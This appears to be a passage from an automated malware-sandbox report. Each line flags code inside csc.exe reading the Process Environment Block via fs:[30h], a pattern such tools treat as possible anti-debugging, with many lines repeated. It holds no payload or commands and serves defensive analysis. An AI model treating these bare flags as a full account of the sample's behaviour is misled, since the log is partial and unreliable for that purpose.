Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E97A9 mov eax, dword ptr fs:[00000030h]	6_2_059E97A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059607AF mov eax, dword ptr fs:[00000030h]	6_2_059607AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0596C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E07C3 mov eax, dword ptr fs:[00000030h]	6_2_059E07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059647FB mov eax, dword ptr fs:[00000030h]	6_2_059647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059647FB mov eax, dword ptr fs:[00000030h]	6_2_059647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D7E0 mov ecx, dword ptr fs:[00000030h]	6_2_0596D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EE7E1 mov eax, dword ptr fs:[00000030h]	6_2_059EE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960710 mov eax, dword ptr fs:[00000030h]	6_2_05960710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F71F mov eax, dword ptr fs:[00000030h]	6_2_0599F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F71F mov eax, dword ptr fs:[00000030h]	6_2_0599F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2972B mov eax, dword ptr fs:[00000030h]	6_2_05A2972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990710 mov eax, dword ptr fs:[00000030h]	6_2_05990710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F72E mov eax, dword ptr fs:[00000030h]	6_2_05A1F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965702 mov eax, dword ptr fs:[00000030h]	6_2_05965702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965702 mov eax, dword ptr fs:[00000030h]	6_2_05965702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05967703 mov eax, dword ptr fs:[00000030h]	6_2_05967703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C700 mov eax, dword ptr fs:[00000030h]	6_2_0599C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov eax, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov ecx, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov eax, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959730 mov eax, dword ptr fs:[00000030h]	6_2_05959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959730 mov eax, dword ptr fs:[00000030h]	6_2_05959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596973A mov eax, dword ptr fs:[00000030h]	6_2_0596973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596973A mov eax, dword ptr fs:[00000030h]	6_2_0596973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DC730 mov eax, dword ptr fs:[00000030h]	6_2_059DC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05995734 mov eax, dword ptr fs:[00000030h]	6_2_05995734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963720 mov eax, dword ptr fs:[00000030h]	6_2_05963720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C720 mov eax, dword ptr fs:[00000030h]	6_2_0599C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C720 mov eax, dword ptr fs:[00000030h]	6_2_0599C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EE75D mov eax, dword ptr fs:[00000030h]	6_2_059EE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960750 mov eax, dword ptr fs:[00000030h]	6_2_05960750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2750 mov eax, dword ptr fs:[00000030h]	6_2_059A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2750 mov eax, dword ptr fs:[00000030h]	6_2_059A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4755 mov eax, dword ptr fs:[00000030h]	6_2_059E4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov esi, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov eax, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov eax, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968770 mov eax, dword ptr fs:[00000030h]	6_2_05968770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A33749 mov eax, dword ptr fs:[00000030h]	6_2_05A33749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05964690 mov eax, dword ptr fs:[00000030h]	6_2_05964690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05964690 mov eax, dword ptr fs:[00000030h]	6_2_05964690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059966B0 mov eax, dword ptr fs:[00000030h]	6_2_059966B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D6AA mov eax, dword ptr fs:[00000030h]	6_2_0595D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D6AA mov eax, dword ptr fs:[00000030h]	6_2_0595D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0599C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1D6F0 mov eax, dword ptr fs:[00000030h]	6_2_05A1D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059916CF mov eax, dword ptr fs:[00000030h]	6_2_059916CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F6C7 mov eax, dword ptr fs:[00000030h]	6_2_05A1F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E06F1 mov eax, dword ptr fs:[00000030h]	6_2_059E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E06F1 mov eax, dword ptr fs:[00000030h]	6_2_059E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059936EF mov eax, dword ptr fs:[00000030h]	6_2_059936EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0598D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0598D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963616 mov eax, dword ptr fs:[00000030h]	6_2_05963616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963616 mov eax, dword ptr fs:[00000030h]	6_2_05963616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2619 mov eax, dword ptr fs:[00000030h]	6_2_059A2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE609 mov eax, dword ptr fs:[00000030h]	6_2_059DE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35636 mov eax, dword ptr fs:[00000030h]	6_2_05A35636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F603 mov eax, dword ptr fs:[00000030h]	6_2_0599F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05991607 mov eax, dword ptr fs:[00000030h]	6_2_05991607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E627 mov eax, dword ptr fs:[00000030h]	6_2_0597E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05996620 mov eax, dword ptr fs:[00000030h]	6_2_05996620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998620 mov eax, dword ptr fs:[00000030h]	6_2_05998620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596262C mov eax, dword ptr fs:[00000030h]	6_2_0596262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2866E mov eax, dword ptr fs:[00000030h]	6_2_05A2866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2866E mov eax, dword ptr fs:[00000030h]	6_2_05A2866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597C640 mov eax, dword ptr fs:[00000030h]	6_2_0597C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05992674 mov eax, dword ptr fs:[00000030h]	6_2_05992674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A660 mov eax, dword ptr fs:[00000030h]	6_2_0599A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A660 mov eax, dword ptr fs:[00000030h]	6_2_0599A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05999660 mov eax, dword ptr fs:[00000030h]	6_2_05999660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05999660 mov eax, dword ptr fs:[00000030h]	6_2_05999660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD660 mov eax, dword ptr fs:[00000030h]	6_2_059FD660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B7190 mov eax, dword ptr fs:[00000030h]	6_2_059B7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A0185 mov eax, dword ptr fs:[00000030h]	6_2_059A0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597B1B0 mov eax, dword ptr fs:[00000030h]	6_2_0597B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h]	6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h]	6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A361E5 mov eax, dword ptr fs:[00000030h]	6_2_05A361E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D1D0 mov eax, dword ptr fs:[00000030h]	6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D1D0 mov ecx, dword ptr fs:[00000030h]	6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A071F9 mov esi, dword ptr fs:[00000030h]	6_2_05A071F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h]	6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h]	6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059901F8 mov eax, dword ptr fs:[00000030h]	6_2_059901F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A351CB mov eax, dword ptr fs:[00000030h]	6_2_05A351CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
